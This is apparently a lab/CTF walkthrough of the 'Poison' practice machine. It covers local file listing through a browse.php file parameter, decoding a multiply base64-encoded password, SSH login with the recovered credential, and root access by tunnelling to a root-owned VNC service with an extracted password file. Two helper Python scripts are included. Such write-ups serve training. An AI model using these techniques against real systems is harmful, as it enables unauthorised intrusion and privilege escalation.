June 6, keeping this to publish later

1 probe

Starting Nmap 7.60 ( https://nmap.org ) at 2018-06-06 11:31 BST
Nmap scan report for 10.10.10.84
Host is up (0.035s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

I found an info.php with what I assume is the installation date and the users:

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64

The home page says you can test a series of files:

 Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php
http://10.10.10.84/browse.php?file=listfiles.php 

shows that there is a backup:
Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )
http://10.10.10.84/pwdbackup.txt

shows:

This password is secure, it's encoded atleast 13 times.. what could go wrong really..
If you base64-decode it (the = padding gives it away), peeling off one layer at a time,

you get Charix!2#4%6&8(0

We assume that is the password, and it was.
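Doing the 13 decodes by hand is error-prone, and the note only says "at least" 13. The script below is an added example (not from the original notes) that peels base64 layers until the data stops decoding cleanly; the blob it works on is a constructed stand-in, the recovered password re-wrapped 13 times with 76-column line wraps the way base64(1) produces them, since the real pwdbackup.txt contents are not reproduced on this page.

```python
import base64
import binascii
import string

# Constructed sample input: the recovered password wrapped 13 times, standing in
# for the real pwdbackup.txt blob (not reproduced on this page).
PASSWORD = "Charix!2#4%6&8(0"
LAYERS = 13


def wrap(plain: str, layers: int) -> str:
    """Base64-encode `plain` `layers` times, wrapping every layer at 76 columns
    the way the base64(1) CLI does, so the newlines end up inside the blob."""
    data = plain.encode()
    for _ in range(layers):
        enc = base64.b64encode(data)
        data = b"\n".join(enc[i:i + 76] for i in range(0, len(enc), 76)) + b"\n"
    return data.decode()


def peel(blob: str, max_layers: int = 64) -> tuple[str, int]:
    """Strip base64 layers until the data stops decoding cleanly.

    Two stop conditions: the bytes are not valid base64 (wrong alphabet or bad
    padding), or the decoded bytes contain non-printable characters, which is
    how a binary or garbage layer is rejected. Returns (plaintext, layers)."""
    data = blob.encode()
    layers = 0
    while layers < max_layers:
        stripped = b"".join(data.split())  # drop the 76-column line wraps
        try:
            decoded = base64.b64decode(stripped, validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded or any(chr(b) not in string.printable for b in decoded):
            break
        data = decoded
        layers += 1
    return data.decode(errors="replace"), layers


if __name__ == "__main__":
    blob = wrap(PASSWORD, LAYERS)
    plaintext, depth = peel(blob)
    print(f"{depth} layers -> {plaintext!r}")
```

One caveat: a final plaintext that happens to consist only of base64 alphabet characters with a length that is a multiple of 4 would be peeled one layer too far; this password stops the loop because `!` is not in the alphabet, so check the last two layers by eye when the result looks off.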

Once in, after submitting the user flag, you can open the zip file with the same password, and the extracted file shows:

œš[|Ֆz!

That is the 8-byte VNC password file (the password obfuscated with VNC's fixed DES key), which is why it looks like binary garbage rather than text.

If you type top you can see everything that is running:

  PID USERNAME    THR PRI NICE   SIZE    RES STATE    TIME    WCPU COMMAND
  543 root          2  20    0 56320K  5396K select   0:02   0.06% vmtoolsd
  793 charix        1  20    0 20160K  3436K RUN      0:00   0.03% top
  785 charix        1  20    0 85228K  7900K select   0:00   0.01% sshd
  642 root          1  20    0 20636K  6140K select   0:00   0.00% sendmail
  625 root          1  20    0 99172K 11516K select   0:00   0.00% httpd
  319 root          1  20    0  9560K  5052K select   0:00   0.00% devd
  390 root          1  20    0 10500K  2396K select   0:00   0.00% syslogd
  529 root          1  20    0 23620K  8872K select   0:00   0.00% Xvnc
  540 root          1  33    0 67220K  7064K select   0:00   0.00% xterm
  782 root          1  20    0 85228K  7832K select   0:00   0.00% sshd
  786 charix        1  20    0 19660K  3624K pause    0:00   0.00% csh
  640 www           1  20    0    99M 11896K kqread   0:00   0.00% httpd
  650 root          1  20    0 12592K  2436K nanslp   0:00   0.00% cron
  620 root          1  20    0 57812K  7052K select   0:00   0.00% sshd
  541 root          1  25    0 37620K  5312K select   0:00   0.00% twm
  638 www           1  20    0    99M 11896K lockf    0:00   0.00% httpd
  641 www           1  20    0    99M 11888K lockf    0:00   0.00% httpd

In this case the interesting thing could be the VNC, which I assume can be poisoned and that's why it is called Poison. Let's see... LinEnum: nothing.

Sockstat

charix@Poison:/etc % sockstat 
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS      
charix   sshd       785   3  tcp4   10.10.10.84:22        10.10.14.6:50008
charix   sshd       785   4  stream -> ??
root     sshd       782   3  tcp4   10.10.10.84:22        10.10.14.6:50008
root     sshd       782   5  stream -> ??
smmsp    sendmail   646   3  dgram  -> /var/run/log
www      httpd      645   3  tcp6   *:80                  *:*
www      httpd      645   4  tcp4   *:80                  *:*
root     sendmail   642   3  tcp4   127.0.0.1:25          *:*
root     sendmail   642   4  dgram  -> /var/run/logpriv
www      httpd      641   3  tcp6   *:80                  *:*
www      httpd      641   4  tcp4   *:80                  *:*
www      httpd      640   3  tcp6   *:80                  *:*
www      httpd      640   4  tcp4   *:80                  *:*
www      httpd      639   3  tcp6   *:80                  *:*
www      httpd      639   4  tcp4   *:80                  *:*
www      httpd      638   3  tcp6   *:80                  *:*
www      httpd      638   4  tcp4   *:80                  *:*
www      httpd      637   3  tcp6   *:80                  *:*
www      httpd      637   4  tcp4   *:80                  *:*
root     httpd      625   3  tcp6   *:80                  *:*
root     httpd      625   4  tcp4   *:80                  *:*
root     sshd       620   3  tcp6   *:22                  *:*
root     sshd       620   4  tcp4   *:22                  *:*
root     twm        541   3  stream -> /tmp/.X11-unix/X1
root     xterm      540   3  stream -> /tmp/.X11-unix/X1
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*
root     Xvnc       529   4  stream /tmp/.X11-unix/X1
root     Xvnc       529   5  stream /tmp/.X11-unix/X1
root     syslogd    390   4  dgram  /var/run/log
root     syslogd    390   5  dgram  /var/run/logpriv
root     syslogd    390   6  udp6   *:514                 *:*
root     syslogd    390   7  udp4   *:514                 *:*
root     devd       319   4  stream /var/run/devd.pipe
root     devd       319   5  seqpac /var/run/devd.seqpacket.pipe
root     devd       319   7  dgram  -> /var/run/logpriv
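The reasoning step in the sockstat output is spotting services that listen only on 127.0.0.1 (foreign address `*:*`, so they are listeners, but bound to loopback, so they are unreachable from the network) and are owned by root. The script below is an added example, not part of the original notes: it parses the sockstat lines above (copied from this page as the sample input) and builds the ssh -L command for the ports found. The user and host passed to `ssh_forward_command` are the charix credentials and target IP from this box.

```python
# Sample input: the sockstat output from the Poison box shown above, copied from
# this page. Only the header and the TCP lines matter to the parser.
SOCKSTAT_OUTPUT = """\
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
charix   sshd       785   3  tcp4   10.10.10.84:22        10.10.14.6:50008
charix   sshd       785   4  stream -> ??
root     sshd       782   3  tcp4   10.10.10.84:22        10.10.14.6:50008
smmsp    sendmail   646   3  dgram  -> /var/run/log
www      httpd      645   3  tcp6   *:80                  *:*
www      httpd      645   4  tcp4   *:80                  *:*
root     sendmail   642   3  tcp4   127.0.0.1:25          *:*
root     sendmail   642   4  dgram  -> /var/run/logpriv
root     sshd       620   3  tcp6   *:22                  *:*
root     sshd       620   4  tcp4   *:22                  *:*
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*
root     syslogd    390   7  udp4   *:514                 *:*
"""


def loopback_listeners(sockstat_output):
    """Return (user, command, pid, port) for TCP sockets that are listening
    (foreign address *:*) and bound only to a loopback address, sorted by port.
    These are the services you cannot reach from the network and need a
    forward for."""
    found = []
    for line in sockstat_output.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0] == "USER":
            continue  # header, unix sockets without a peer, blank lines
        user, command, pid, _fd, proto, local, foreign = fields[:7]
        if not proto.startswith("tcp") or foreign != "*:*":
            continue  # not TCP, or an established connection rather than a listener
        host, _, port = local.rpartition(":")
        if host.startswith("127.") or host in ("::1", "[::1]"):
            found.append((user, command, int(pid), int(port)))
    return sorted(found, key=lambda entry: entry[3])


def ssh_forward_command(listeners, user, host):
    """Build one ssh(1) invocation that forwards every loopback-only port to
    the same local port, so a client on the attacking box can connect to
    127.0.0.1:<port>. user/host are the SSH credentials already obtained."""
    ports = sorted({port for _, _, _, port in listeners})
    forwards = " ".join(f"-L {p}:127.0.0.1:{p}" for p in ports)
    return f"ssh -N {forwards} {user}@{host}"


if __name__ == "__main__":
    hits = loopback_listeners(SOCKSTAT_OUTPUT)
    for user, command, pid, port in hits:
        print(f"{user:8} {command:10} pid={pid:<5} 127.0.0.1:{port}")
    print(ssh_forward_command(hits, "charix", "10.10.10.84"))
```

On this box the parser returns sendmail on 25 and Xvnc on 5801 and 5901, all owned by root. Two practical notes: binding local port 25 on the attacking machine needs root (privileged port), so drop it from the forward unless you need SMTP, and 5801 is TightVNC's HTTP applet port for display :1, while 5901 is the RFB port the viewer actually speaks to.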

Port 5901 Details

After several hours, I finally rooted the machine a few minutes ago. What I can add is,

  • forget the secret file as long as you don’t know the vulnerable service.
  • Once you know, what is running, you can google for how to use that service.
  • There are tons of walkthroughs on how to set up a particular connection to that service.

Hope this does not reveal too much.

Check this:

charix@Poison:/etc % locate Xvnc
/usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__FreeBSD.cf
/usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__Imake.cf
/usr/ports/net/tightvnc/files/patch-Xvnc__config__cf__vnclibs.def
/usr/ports/net/tightvnc/files/patch-Xvnc__config__imake__imakemdep.h
/usr/ports/net/tightvnc/files/patch-Xvnc__include__Xos.h
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__dix__Imakefile
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__hw__vnc__sockets.c
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__hw__xfree86__common__compiler.h
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__os__Imakefile
/usr/ports/net/tightvnc/files/patch-Xvnc__programs__Xserver__os__access.c

In another terminal, forward the VNC port over SSH:

ssh -L 5901:localhost:5901 charix@10.10.10.84

Then unzip the secret file and point the viewer at the tunnel, passing the extracted file as the password file:

unzip secret.zip
root@kali:~# '/root/Downloads/VNC-Viewer-6.17.1113-Linux-x64'  127.0.0.1:5901 -passwd /root/secret

And done, we have root access: Xvnc runs as root, so the desktop it serves is root's.

IppSec does this more easily: